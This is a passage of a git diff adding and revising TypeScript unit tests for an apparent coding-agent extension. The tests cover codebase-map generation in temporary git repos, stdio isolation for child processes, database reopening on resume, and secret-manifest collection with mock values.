+test("agent-end-recovery references google-gemini-cli for rate-limit handling (#2922)", () => {
+  const src = getRecoverySource();
+  assert.ok(
+    src.includes("google-gemini-cli"),
+    'agent-end-recovery.ts must reference "google-gemini-cli" for CLI provider rate-limit handling (#2922)',
+  );
+});
+
+test("agent-end-recovery caps rate-limit backoff for CLI providers (#2922)", () => {
+  const src = getRecoverySource();
+  // Must have a Math.min capping pattern for CLI provider rate-limit backoff
+  const cappingRe = /Math\.min\s*\(/;
+  assert.ok(
+    cappingRe.test(src),
+    'agent-end-recovery.ts must cap rate-limit backoff with Math.min for CLI providers (#2922)',
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/cmux.test.ts b/src/resources/extensions/gsd/tests/cmux.test.ts
index f25953542..0e6dd8e77 100644
--- a/src/resources/extensions/gsd/tests/cmux.test.ts
+++ b/src/resources/extensions/gsd/tests/cmux.test.ts
@@ -193,6 +193,64 @@ describe("createGridLayout", () => {
   });
 });
 
+describe("CmuxClient stdio isolation", () => {
+  test("runSync and runAsync explicitly set stdio to prevent terminal interference", () => {
+    // Read the cmux index source and verify that execFileSync/spawn calls
+    // inside runSync/runAsync include stdio options that isolate stdin and stderr.
+    // This prevents the cmux CLI child process from inheriting the parent's
+    // stdin/stderr, which can steal keyboard input or corrupt TUI rendering (#1922).
+    const cmuxIndexPath = path.resolve(
+      path.dirname(fileURLToPath(import.meta.url)),
+      "../../cmux/index.ts",
+    );
+    const source = fs.readFileSync(cmuxIndexPath, "utf-8");
+
+    // Extract runSync method body
+    const runSyncMatch = source.match(/private runSync\(args: string\[\]\)[^{]*\{([\s\S]*?)\n  \}/);
+    assert.ok(runSyncMatch, "runSync method must exist");
+    const runSyncBody = runSyncMatch[1];
+    assert.ok(
+      runSyncBody.includes('stdio:'),
+      "runSync must explicitly set stdio to prevent terminal interference (see #1922)",
+    );
+    assert.ok(
+      runSyncBody.includes('"ignore"'),
+      "runSync stdio must ignore stdin to prevent stealing keyboard input from TUI",
+    );
+
+    // Extract runAsync method body
+    const runAsyncMatch = source.match(/private async runAsync\(args: string\[\]\)[^{]*\{([\s\S]*?)\n  \}/);
+    assert.ok(runAsyncMatch, "runAsync method must exist");
+    const runAsyncBody = runAsyncMatch[1];
+    assert.ok(
+      runAsyncBody.includes('stdio:'),
+      "runAsync must explicitly set stdio to prevent terminal interference (see #1922)",
+    );
+    assert.ok(
+      runAsyncBody.includes('"ignore"'),
+      "runAsync stdio must ignore stdin to prevent stealing keyboard input from TUI",
+    );
+  });
+
+  test("isCmuxCliAvailable uses stdio ignore to prevent terminal interference", () => {
+    const cmuxIndexPath = path.resolve(
+      path.dirname(fileURLToPath(import.meta.url)),
+      "../../cmux/index.ts",
+    );
+    const source = fs.readFileSync(cmuxIndexPath, "utf-8");
+
+    // Find isCmuxCliAvailable or the cli-check function body
+    const fnMatch = source.match(/function isCmuxCliAvailable[\s\S]*?\{([\s\S]*?)\n\}/);
+    if (!fnMatch) return; // function may be inlined or renamed — skip rather than fail
+
+    const fnBody = fnMatch[1];
+    assert.ok(
+      fnBody.includes('"ignore"') || !fnBody.includes('execFileSync'),
+      "isCmuxCliAvailable must not inherit parent stdio (see #1922)",
+    );
+  });
+});
+
 describe("cmux extension discovery opt-out", () => {
   test("cmux directory has package.json with pi manifest to prevent auto-discovery as extension", () => {
     const cmuxDir = path.resolve(
diff --git a/src/resources/extensions/gsd/tests/codebase-generator.test.ts b/src/resources/extensions/gsd/tests/codebase-generator.test.ts
new file mode 100644
index 000000000..d8d3d74c8
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/codebase-generator.test.ts
@@ -0,0 +1,641 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+import { mkdirSync, writeFileSync, readFileSync, existsSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { randomUUID } from "node:crypto";
+import { execSync } from "node:child_process";
+
+import {
+  parseCodebaseMap,
+  parseCodebaseMapMetadata,
+  generateCodebaseMap,
+  updateCodebaseMap,
+  writeCodebaseMap,
+  readCodebaseMap,
+  getCodebaseMapStats,
+  ensureCodebaseMapFresh,
+} from "../codebase-generator.ts";
+
+// ─── Helpers ──────────────────────────────────────────────────────────────
+
+function makeTmpRepo(): string {
+  const base = join(tmpdir(), `gsd-codebase-test-${randomUUID()}`);
+  mkdirSync(join(base, ".gsd"), { recursive: true });
+  execSync("git init", { cwd: base, stdio: "ignore" });
+  return base;
+}
+
+function addFile(base: string, path: string, content = ""): void {
+  const fullPath = join(base, path);
+  mkdirSync(join(fullPath, ".."), { recursive: true });
+  writeFileSync(fullPath, content || `// ${path}\n`, "utf-8");
+  execSync(`git add "${path}"`, { cwd: base, stdio: "ignore" });
+}
+
+function cleanup(base: string): void {
+  try { rmSync(base, { recursive: true, force: true }); } catch { /* */ }
+}
+
+// ─── parseCodebaseMap ────────────────────────────────────────────────────
+
+test("parseCodebaseMap: parses file with description", () => {
+  const content = `# Codebase Map
+
+### src/
+- \`main.ts\` — Application entry point
+- \`utils.ts\` — Shared utilities
+`;
+
+  const map = parseCodebaseMap(content);
+  assert.equal(map.size, 2);
+  assert.equal(map.get("main.ts"), "Application entry point");
+  assert.equal(map.get("utils.ts"), "Shared utilities");
+});
+
+test("parseCodebaseMap: parses file without description", () => {
+  const content = `- \`config.ts\`\n- \`index.ts\` — Entry\n`;
+  const map = parseCodebaseMap(content);
+  assert.equal(map.size, 2);
+  assert.equal(map.get("config.ts"), "");
+  assert.equal(map.get("index.ts"), "Entry");
+});
+
+test("parseCodebaseMap: empty content returns empty map", () => {
+  const map = parseCodebaseMap("");
+  assert.equal(map.size, 0);
+});
+
+test("parseCodebaseMap: ignores non-matching lines", () => {
+  const content = `# Codebase Map\n\nGenerated: 2026-03-23\n\n### src/\n- \`file.ts\` — desc\n`;
+  const map = parseCodebaseMap(content);
+  assert.equal(map.size, 1);
+});
+
+test("parseCodebaseMap: recovers descriptions from collapsed-description comments", () => {
+  const content = `# Codebase Map
+
+### src/components/
+- *(25 files: 25 .ts)*
+<!-- gsd:collapsed-descriptions
+- \`src/components/Foo.ts\` — The Foo component
+- \`src/components/Bar.ts\` — The Bar component
+-->
+`;
+  const map = parseCodebaseMap(content);
+  assert.equal(map.get("src/components/Foo.ts"), "The Foo component");
+  assert.equal(map.get("src/components/Bar.ts"), "The Bar component");
+  // The collapsed summary line itself should not be parsed as a file
+  assert.ok(!map.has("*(25 files: 25 .ts)*"));
+});
+
+test("parseCodebaseMap: handles corrupted/malformed input gracefully", () => {
+  const content = [
+    "- `unclosed backtick",
+    "- `` — empty filename",
+    "- `valid.ts` — ok",
+    "random garbage line",
+    "- `a.ts` — desc with other text",
+  ].join("\n");
+  const map = parseCodebaseMap(content);
+  assert.ok(map.has("valid.ts"));
+  assert.ok(map.has("a.ts"));
+  // Malformed lines should be silently skipped
+  assert.equal(map.size, 2);
+});
+
+// ─── generateCodebaseMap ─────────────────────────────────────────────────
+
+test("generateCodebaseMap: generates from git ls-files", () => {
+  const base = makeTmpRepo();
+  try {
+    addFile(base, "src/main.ts");
+    addFile(base, "src/utils.ts");
+    addFile(base, "README.md");
+
+    const result = generateCodebaseMap(base);
+    assert.ok(result.content.includes("# Codebase Map"));
+    assert.ok(result.content.includes("`src/main.ts`"));
+    assert.ok(result.content.includes("`src/utils.ts`"));
+    assert.ok(result.content.includes("README.md"));
+    assert.equal(result.fileCount, 3);
+    assert.equal(result.truncated, false);
+    assert.equal(result.files.length, 3);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("generateCodebaseMap: excludes .gsd/ files", () => {
+  const base = makeTmpRepo();
+  try {
+    addFile(base, "src/main.ts");
+    addFile(base, ".gsd/PROJECT.md");
+
+    const result = generateCodebaseMap(base);
+    assert.ok(result.content.includes("`src/main.ts`"));
+    assert.ok(!result.content.includes("PROJECT.md"));
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("generateCodebaseMap: excludes .claude/ and other tool directories", () => {
+  const base = makeTmpRepo();
+  try {
+    addFile(base, "src/main.ts");
+    addFile(base, ".claude/CLAUDE.md");
+    addFile(base, ".claude/memory/user.md");
+    addFile(base, ".plans/plan.md");
+    addFile(base, ".cursor/settings.json");
+    addFile(base, ".vscode/settings.json");
+
+    const result = generateCodebaseMap(base);
+    assert.ok(result.content.includes("`src/main.ts`"), "should include src/main.ts");
+    assert.ok(!result.content.includes("CLAUDE.md"), "should exclude .claude/ files");
+    assert.ok(!result.content.includes("user.md"), "should exclude .claude/memory/ files");
+    assert.ok(!result.content.includes(".plans"), "should exclude .plans/ files");
+    assert.ok(!result.content.includes(".cursor"), "should exclude .cursor/ files");
+    assert.ok(!result.content.includes(".vscode"), "should exclude .vscode/ files");
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("generateCodebaseMap: excludes binary and lock files", () => {
+  const base = makeTmpRepo();
+  try {
+    addFile(base, "src/main.ts");
+    addFile(base, "package-lock.json"); // .json not excluded
+    addFile(base, "yarn.lock");         // .lock excluded
+    addFile(base, "assets/logo.png");   // .png excluded
+
+    const result = generateCodebaseMap(base);
+    assert.ok(result.content.includes("`src/main.ts`"));
+    assert.ok(result.content.includes("package-lock.json"));
+    assert.ok(!result.content.includes("yarn.lock"));
+    assert.ok(!result.content.includes("logo.png"));
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("generateCodebaseMap: respects custom excludePatterns", () => {
+  const base = makeTmpRepo();
+  try {
+    addFile(base, "src/main.ts");
+    addFile(base, "docs/guide.md");
+    addFile(base, "docs/api.md");
+
+    const result = generateCodebaseMap(base, { excludePatterns: ["docs/"] });
+    assert.ok(result.content.includes("`src/main.ts`"));
+    assert.ok(!result.content.includes("guide.md"));
+    assert.ok(!result.content.includes("api.md"));
+    assert.equal(result.fileCount, 1);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("generateCodebaseMap: preserves existing descriptions", () => {
+  const base = makeTmpRepo();
+  try {
+    addFile(base, "src/main.ts");
+    addFile(base, "src/utils.ts");
+
+    const descriptions = new Map<string, string>();
+    descriptions.set("src/main.ts", "App entry point");
+
+    const result = generateCodebaseMap(base, undefined, descriptions);
+    assert.ok(result.content.includes("`src/main.ts` — App entry point"));
+    assert.ok(result.content.includes("`src/utils.ts`"));
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("generateCodebaseMap: writes freshness metadata comment", () => {
+  const base = makeTmpRepo();
+  try {
+    addFile(base, "src/main.ts");
+
+    const result = generateCodebaseMap(base);
+    const metadata = parseCodebaseMapMetadata(result.content);
+
+    assert.ok(metadata, "metadata comment should be present");
+    assert.equal(metadata?.fileCount, 1);
+    assert.equal(metadata?.truncated, false);
+    assert.equal(typeof metadata?.fingerprint, "string");
+    assert.ok(metadata?.generatedAt?.endsWith("Z"));
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("generateCodebaseMap: collapses large directories", () => {
+  const base = makeTmpRepo();
+  try {
+    for (let i = 0; i < 25; i++) {
+      addFile(base, `src/components/comp${String(i).padStart(2, "0")}.ts`);
+    }
+
+    const result = generateCodebaseMap(base);
+    // Collapsed summary should appear
+    assert.ok(result.content.includes("*(25 files: 25 .ts)*"));
+    // Individual file entries should NOT appear in main body
+    assert.ok(!result.content.includes("`src/components/comp00.ts`\n"));
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("generateCodebaseMap: respects custom collapseThreshold", () => {
+  const base = makeTmpRepo();
+  try {
+    for (let i = 0; i < 5; i++) addFile(base, `src/comp${i}.ts`);
+
+    // Low threshold: 5 files should collapse
+    const collapsed = generateCodebaseMap(base, { collapseThreshold: 3 });
+    assert.ok(collapsed.content.includes("5 files"));
+
+    // High threshold: 5 files should expand
+    const expanded = generateCodebaseMap(base, { collapseThreshold: 10 });
+    assert.ok(expanded.content.includes("`src/comp0.ts`"));
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("generateCodebaseMap: truncated=false when file count is below maxFiles", () => {
+  const base = makeTmpRepo();
+  try {
+    for (let i = 0; i < 4; i++) addFile(base, `file${i}.ts`);
+    const result = generateCodebaseMap(base, { maxFiles: 5 });
+    assert.equal(result.fileCount, 4);
+    assert.equal(result.truncated, false);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("generateCodebaseMap: truncated=false when file count equals maxFiles exactly", () => {
+  const base = makeTmpRepo();
+  try {
+    for (let i = 0; i < 5; i++) addFile(base, `file${i}.ts`);
+    const result = generateCodebaseMap(base, { maxFiles: 5 });
+    assert.equal(result.fileCount, 5);
+    assert.equal(result.truncated, false); // exactly at limit — nothing was truncated
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("generateCodebaseMap: truncated=true when file count exceeds maxFiles", () => {
+  const base = makeTmpRepo();
+  try {
+    for (let i = 0; i < 10; i++) addFile(base, `file${i}.ts`);
+    const result = generateCodebaseMap(base, { maxFiles: 5 });
+    assert.equal(result.fileCount, 5);
+    assert.equal(result.truncated, true);
+    assert.ok(result.content.includes("Truncated"));
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("generateCodebaseMap: returns empty map for non-git directory", () => {
+  const base = join(tmpdir(), `gsd-codebase-test-${randomUUID()}`);
+  mkdirSync(join(base, ".gsd"), { recursive: true });
+  // No git init
+  try {
+    const result = generateCodebaseMap(base);
+    assert.equal(result.fileCount, 0);
+    assert.equal(result.truncated, false);
+    assert.ok(result.content.includes("# Codebase Map"));
+    assert.equal(result.files.length, 0);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("generateCodebaseMap: handles empty repository (no committed files)", () => {
+  const base = makeTmpRepo();
+  try {
+    const result = generateCodebaseMap(base);
+    assert.equal(result.fileCount, 0);
+    assert.equal(result.truncated, false);
+    assert.ok(result.content.includes("Files: 0"));
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("generateCodebaseMap: collapsed directories preserve descriptions in hidden comment", () => {
+  const base = makeTmpRepo();
+  try {
+    for (let i = 0; i < 25; i++) {
+      addFile(base, `src/components/comp${String(i).padStart(2, "0")}.ts`);
+    }
+
+    // Generate with a description for one file in the collapsed dir
+    const descriptions = new Map([["src/components/comp00.ts", "The first component"]]);
+    const result = generateCodebaseMap(base, undefined, descriptions);
+
+    // The description should be in the hidden comment block
+    assert.ok(result.content.includes("<!-- gsd:collapsed-descriptions"));
+    assert.ok(result.content.includes("`src/components/comp00.ts` — The first component"));
+
+    // Re-parsing should recover the description
+    const recovered = parseCodebaseMap(result.content);
+    assert.equal(recovered.get("src/components/comp00.ts"), "The first component");
+  } finally {
+    cleanup(base);
+  }
+});
+
+// ─── updateCodebaseMap ───────────────────────────────────────────────────
+
+test("updateCodebaseMap: preserves descriptions on update", () => {
+  const base = makeTmpRepo();
+  try {
+    addFile(base, "src/main.ts");
+    addFile(base, "src/utils.ts");
+
+    const initial = generateCodebaseMap(base, undefined, new Map([["src/main.ts", "Entry point"]]));
+    writeCodebaseMap(base, initial.content);
+
+    addFile(base, "src/new.ts");
+
+    const result = updateCodebaseMap(base);
+    assert.ok(result.content.includes("`src/main.ts` — Entry point"));
+    assert.equal(result.added, 1);
+    assert.equal(result.fileCount, 3);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("updateCodebaseMap: tracks removed files", () => {
+  const base = makeTmpRepo();
+  try {
+    addFile(base, "src/keep.ts");
+    addFile(base, "src/remove.ts");
+    // Commit so git rm can operate
+    execSync("git -c user.email=t@t.com -c user.name=T commit -m init", { cwd: base, stdio: "ignore" });
+
+    const initial = generateCodebaseMap(base);
+    writeCodebaseMap(base, initial.content);
+
+    execSync("git rm src/remove.ts", { cwd: base, stdio: "ignore" });
+
+    const result = updateCodebaseMap(base);
+    assert.equal(result.removed, 1);
+    assert.equal(result.unchanged, 1);
+    assert.equal(result.fileCount, 1);
+    assert.ok(!result.content.includes("remove.ts"));
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("updateCodebaseMap: propagates truncated flag", () => {
+  const base = makeTmpRepo();
+  try {
+    for (let i = 0; i < 10; i++) addFile(base, `file${i}.ts`);
+
+    const initial = generateCodebaseMap(base, { maxFiles: 5 });
+    writeCodebaseMap(base, initial.content);
+
+    const result = updateCodebaseMap(base, { maxFiles: 5 });
+    assert.equal(result.truncated, true);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("updateCodebaseMap: preserves descriptions from collapsed directories", () => {
+  const base = makeTmpRepo();
+  try {
+    for (let i = 0; i < 25; i++) {
+      addFile(base, `src/components/comp${String(i).padStart(2, "0")}.ts`);
+    }
+
+    // Generate with a description in the (collapsed) components dir
+    const descriptions = new Map([["src/components/comp00.ts", "The first component"]]);
+    const initial = generateCodebaseMap(base, undefined, descriptions);
+    writeCodebaseMap(base, initial.content);
+
+    // Update should recover description from the hidden comment
+    const result = updateCodebaseMap(base);
+    const recovered = parseCodebaseMap(result.content);
+    assert.equal(recovered.get("src/components/comp00.ts"), "The first component");
+  } finally {
+    cleanup(base);
+  }
+});
+
+// ─── writeCodebaseMap / readCodebaseMap ──────────────────────────────────
+
+test("writeCodebaseMap + readCodebaseMap roundtrip", () => {
+  const base = makeTmpRepo();
+  try {
+    const content = "# Codebase Map\n\n- `test.ts` — A test file\n";
+    const outPath = writeCodebaseMap(base, content);
+    assert.ok(existsSync(outPath));
+
+    const read = readCodebaseMap(base);
+    assert.equal(read, content);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("readCodebaseMap: returns null when file missing", () => {
+  const base = makeTmpRepo();
+  try {
+    const result = readCodebaseMap(base);
+    assert.equal(result, null);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("writeCodebaseMap: creates .gsd/ directory if missing", () => {
+  const base = join(tmpdir(), `gsd-codebase-test-${randomUUID()}`);
+  mkdirSync(base, { recursive: true });
+  // Intentionally do NOT pre-create .gsd/
+  try {
+    const outPath = writeCodebaseMap(base, "# Codebase Map\n");
+    assert.ok(existsSync(outPath));
+  } finally {
+    cleanup(base);
+  }
+});
+
+// ─── getCodebaseMapStats ─────────────────────────────────────────────────
+
+test("getCodebaseMapStats: no map returns exists=false", () => {
+  const base = makeTmpRepo();
+  try {
+    const stats = getCodebaseMapStats(base);
+    assert.equal(stats.exists, false);
+    assert.equal(stats.fileCount, 0);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("getCodebaseMapStats: reports coverage", () => {
+  const base = makeTmpRepo();
+  try {
+    const content = `# Codebase Map\n\nGenerated: 2026-03-23T14:00:00Z | Files: 3 | Described: 2/3\n\n- \`a.ts\` — Has desc\n- \`b.ts\`\n- \`c.ts\` — Also has\n`;
+    writeCodebaseMap(base, content);
+
+    const stats = getCodebaseMapStats(base);
+    assert.equal(stats.exists, true);
+    assert.equal(stats.fileCount, 3); // from header, not parse count
+    assert.equal(stats.describedCount, 2);
+    assert.equal(stats.undescribedCount, 1);
+    assert.equal(stats.generatedAt, "2026-03-23T14:00:00Z");
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("getCodebaseMapStats: reads total file count from header for accuracy with collapsed dirs", () => {
+  const base = makeTmpRepo();
+  try {
+    // Simulate a map with a collapsed dir: header says 30 files but parser only sees 2
+    const content = [
+      "# Codebase Map",
+      "",
+      "Generated: 2026-03-23T14:00:00Z | Files: 30 | Described: 2/30",
+      "",
+      "### src/components/",
+      "- *(28 files: 28 .ts)*",
+      "",
+      "### src/",
+      "- `main.ts` — Entry point",
+      "- `utils.ts` — Utilities",
+    ].join("\n");
+    writeCodebaseMap(base, content);
+
+    const stats = getCodebaseMapStats(base);
+    assert.equal(stats.fileCount, 30); // from header, not from parseCodebaseMap
+    assert.equal(stats.describedCount, 2);
+    assert.equal(stats.undescribedCount, 28);
+  } finally {
+    cleanup(base);
+  }
+});
+
+// ─── excludePatterns from options ────────────────────────────────────────
+
+test("generateCodebaseMap: custom excludePatterns filters additional directories", () => {
+  const base = makeTmpRepo();
+  try {
+    addFile(base, "src/main.ts");
+    addFile(base, "src/utils.ts");
+    addFile(base, ".cache-data/data/index.lance");
+    addFile(base, "docs/guide.md");
+
+    const result = generateCodebaseMap(base, {
+      excludePatterns: [".cache-data/", "docs/"],
+    });
+    assert.ok(result.content.includes("`src/main.ts`"));
+    assert.ok(result.content.includes("`src/utils.ts`"));
+    assert.ok(!result.content.includes(".cache-data"));
+    assert.ok(!result.content.includes("guide.md"));
+    assert.equal(result.fileCount, 2);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("generateCodebaseMap: collapseThreshold option overrides default", () => {
+  const base = makeTmpRepo();
+  try {
+    // Create 10 files in one directory — below default threshold (20)
+    // but above a custom threshold of 5
+    for (let i = 0; i < 10; i++) {
+      addFile(base, `src/comp${i}.ts`);
+    }
+
+    // With default threshold (20), files should NOT collapse
+    const expanded = generateCodebaseMap(base);
+    assert.ok(expanded.content.includes("`src/comp0.ts`"));
+
+    // With custom threshold (5), files SHOULD collapse
+    const collapsed = generateCodebaseMap(base, { collapseThreshold: 5 });
+    assert.ok(collapsed.content.includes("10 files"));
+    assert.ok(!collapsed.content.includes("`src/comp0.ts`\n"));
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("updateCodebaseMap: respects excludePatterns option", () => {
+  const base = makeTmpRepo();
+  try {
+    addFile(base, "src/main.ts");
+    addFile(base, "vendor-extra/lib.js");
+
+    const initial = generateCodebaseMap(base);
+    writeCodebaseMap(base, initial.content);
+
+    // Update with exclusion should remove vendor-extra files
+    const result = updateCodebaseMap(base, { excludePatterns: ["vendor-extra/"] });
+    assert.ok(result.content.includes("`src/main.ts`"));
+    assert.ok(!result.content.includes("vendor-extra"));
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("ensureCodebaseMapFresh: generates CODEBASE.md when missing", () => {
+  const base = makeTmpRepo();
+  try {
+    addFile(base, "src/main.ts");
+
+    const result = ensureCodebaseMapFresh(base, undefined, { ttlMs: 0, force: true });
+    const written = readCodebaseMap(base);
+
+    assert.equal(result.status, "generated");
+    assert.ok(written?.includes("`src/main.ts`"));
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("ensureCodebaseMapFresh: updates CODEBASE.md when tracked files change", () => {
+  const base = makeTmpRepo();
+  try {
+    addFile(base, "src/main.ts");
+    const initial = ensureCodebaseMapFresh(base, undefined, { ttlMs: 0, force: true });
+    assert.equal(initial.status, "generated");
+
+    addFile(base, "src/new.ts");
+    const refreshed = ensureCodebaseMapFresh(base, undefined, { ttlMs: 0, force: true });
+    const written = readCodebaseMap(base);
+
+    assert.equal(refreshed.status, "updated");
+    assert.equal(refreshed.reason, "files-changed");
+    assert.ok(written?.includes("`src/new.ts`"));
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("ensureCodebaseMapFresh: returns fresh when metadata matches repository state", () => {
+  const base = makeTmpRepo();
+  try {
+    addFile(base, "src/main.ts");
+    ensureCodebaseMapFresh(base, undefined, { ttlMs: 0, force: true });
+
+    const refreshed = ensureCodebaseMapFresh(base, undefined, { ttlMs: 0, force: true });
+    assert.equal(refreshed.status, "fresh");
+    assert.equal(refreshed.fileCount, 1);
+  } finally {
+    cleanup(base);
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/cold-resume-db-reopen.test.ts b/src/resources/extensions/gsd/tests/cold-resume-db-reopen.test.ts
new file mode 100644
index 000000000..ae31af280
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/cold-resume-db-reopen.test.ts
@@ -0,0 +1,51 @@
+/**
+ * cold-resume-db-reopen.test.ts — Regression test for #2940.
+ *
+ * Validates that the paused-session resume path in auto.ts opens the project
+ * database before calling rebuildState() / deriveState(), matching the fresh
+ * bootstrap path in auto-start.ts.
+ *
+ * Without this, cold resume falls back to markdown parsing which misreads
+ * done cells and redispatches wrong slices.
+ */
+
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+
+import { createTestContext } from "./test-helpers.ts";
+
+const { assertTrue, report } = createTestContext();
+
+const autoSrc = readFileSync(join(import.meta.dirname, "..", "auto.ts"), "utf-8");
+
+console.log("\n=== #2940: resume path opens DB before rebuildState/deriveState ===");
+
+// The resume block is the `if (s.paused) { ... }` section that calls rebuildState/deriveState.
+// Locate the resume section by finding `s.paused = false;` followed by `rebuildState`.
+const resumeSectionStart = autoSrc.indexOf("if (s.paused) {", autoSrc.indexOf("// If resuming from paused state"));
+assertTrue(resumeSectionStart > 0, "auto.ts has the paused-session resume block");
+
+const resumeSection = autoSrc.slice(resumeSectionStart, resumeSectionStart + 3000);
+
+// The resume path must open the DB before rebuildState/deriveState
+const rebuildIdx = resumeSection.indexOf("rebuildState(");
+assertTrue(rebuildIdx > 0, "resume block calls rebuildState");
+
+const deriveIdx = resumeSection.indexOf("deriveState(");
+assertTrue(deriveIdx > 0, "resume block calls deriveState");
+
+// There must be a DB open call before the first rebuildState call
+const dbOpenPatterns = [
+  "openProjectDbIfPresent(",
+  "openDatabase(",
+  "ensureDbOpen(",
+];
+
+const preDeriveSection = resumeSection.slice(0, rebuildIdx);
+const hasDbOpen = dbOpenPatterns.some(pat => preDeriveSection.includes(pat));
+assertTrue(
+  hasDbOpen,
+  "resume path must open DB before rebuildState/deriveState (#2940)",
+);
+
+report();
diff --git a/src/resources/extensions/gsd/tests/collect-from-manifest.test.ts b/src/resources/extensions/gsd/tests/collect-from-manifest.test.ts
index 3ac66bba9..9ca2eecd9 100644
--- a/src/resources/extensions/gsd/tests/collect-from-manifest.test.ts
+++ b/src/resources/extensions/gsd/tests/collect-from-manifest.test.ts
@@ -91,142 +91,179 @@ async function loadGuidanceExport(): Promise<{ collectOneSecretWithGuidance: Fun
 
 // ─── collectSecretsFromManifest: categorization ───────────────────────────────
 
-test("collectSecretsFromManifest: categorizes entries — pending keys need collection, existing keys are skipped", async () => {
+test("collectSecretsFromManifest: categorizes entries — pending keys need collection, existing keys are skipped", async (t) => {
 	const { collectSecretsFromManifest } = await loadOrchestrator();
 
 	const tmp = makeTempDir("manifest-collect");
 	const savedA = process.env.EXISTING_KEY_A;
-	try {
-		process.env.EXISTING_KEY_A = "already-set";
-
-		const manifest = makeManifest([
-			{ key: "EXISTING_KEY_A", status: "pending" },
-			{ key: "PENDING_KEY_B", status: "pending", guidance: ["Step 1: Go to dashboard", "Step 2: Click create key"] },
-			{ key: "SKIPPED_KEY_C", status: "skipped" },
-		]);
-		await writeManifestFile(tmp, manifest);
-
-		let callIndex = 0;
-		const mockCtx = {
-			cwd: tmp,
-			hasUI: true,
-			ui: {
-				custom: async (_factory: any) => {
-					callIndex++;
-					if (callIndex <= 1) return null; // summary screen dismiss
-					return "mock-secret-value"; // collect pending key
-				},
-			},
-		};
-
-		const result = await collectSecretsFromManifest(tmp, "M001", mockCtx as any);
-
-		// EXISTING_KEY_A should be in existingSkipped (it's in process.env)
-		assert.ok(result.existingSkipped?.includes("EXISTING_KEY_A"),
-			"EXISTING_KEY_A should be in existingSkipped");
-
-		// PENDING_KEY_B should have been collected (applied)
-		assert.ok(result.applied.includes("PENDING_KEY_B"),
-			"PENDING_KEY_B should be in applied");
-
-		// SKIPPED_KEY_C should remain skipped
-		assert.ok(result.skipped.includes("SKIPPED_KEY_C"),
-			"SKIPPED_KEY_C should be in skipped");
-	} finally {
+	t.after(() => {
 		delete process.env.EXISTING_KEY_A;
 		if (savedA !== undefined) process.env.EXISTING_KEY_A = savedA;
 		rmSync(tmp, { recursive: true, force: true });
-	}
+	});
+
+	process.env.EXISTING_KEY_A = "already-set";
+
+	const manifest = makeManifest([
+		{ key: "EXISTING_KEY_A", status: "pending" },
+		{ key: "PENDING_KEY_B", status: "pending", guidance: ["Step 1: Go to dashboard", "Step 2: Click create key"] },
+		{ key: "SKIPPED_KEY_C", status: "skipped" },
+	]);
+	await writeManifestFile(tmp, manifest);
+
+	let callIndex = 0;
+	const mockCtx = {
+		cwd: tmp,
+		hasUI: true,
+		ui: {
+			custom: async (_factory: any) => {
+				callIndex++;
+				if (callIndex <= 1) return null; // summary screen dismiss
+				return "mock-secret-value"; // collect pending key
+			},
+		},
+	};
+
+	const result = await collectSecretsFromManifest(tmp, "M001", mockCtx as any);
+
+	// EXISTING_KEY_A should be in existingSkipped (it's in process.env)
+	assert.ok(result.existingSkipped?.includes("EXISTING_KEY_A"),
+		"EXISTING_KEY_A should be in existingSkipped");
+
+	// PENDING_KEY_B should have been collected (applied)
+	assert.ok(result.applied.includes("PENDING_KEY_B"),
+		"PENDING_KEY_B should be in applied");
+
+	// SKIPPED_KEY_C should remain skipped
+	assert.ok(result.skipped.includes("SKIPPED_KEY_C"),
+		"SKIPPED_KEY_C should be in skipped");
 });
 
-test("collectSecretsFromManifest: existing keys are excluded from the collection list — not prompted", async () => {
+test("collectSecretsFromManifest: existing keys are excluded from the collection list — not prompted", async (t) => {
 	const { collectSecretsFromManifest } = await loadOrchestrator();
 
 	const tmp = makeTempDir("manifest-collect-skip");
 	const savedA = process.env.ALREADY_SET_KEY;
-	try {
-		process.env.ALREADY_SET_KEY = "present";
-
-		const manifest = makeManifest([
-			{ key: "ALREADY_SET_KEY", status: "pending" },
-			{ key: "NEEDS_COLLECTION", status: "pending" },
-		]);
-		await writeManifestFile(tmp, manifest);
-
-		const collectedKeyNames: string[] = [];
-		let summaryShown = false;
-		const mockCtx = {
-			cwd: tmp,
-			hasUI: true,
-			ui: {
-				custom: async (factory: any) => {
-					// Intercept the factory to check what key is being collected
-					if (!summaryShown) {
-						summaryShown = true;
-						return null; // dismiss summary
-					}
-					collectedKeyNames.push("prompted");
-					return "mock-value";
-				},
-			},
-		};
-
-		const result = await collectSecretsFromManifest(tmp, "M001", mockCtx as any);
-
-		// ALREADY_SET_KEY should not have been prompted — only NEEDS_COLLECTION should
-		assert.ok(!result.applied.includes("ALREADY_SET_KEY"),
-			"ALREADY_SET_KEY should not be in applied (it was auto-skipped)");
-		assert.ok(result.existingSkipped?.includes("ALREADY_SET_KEY"),
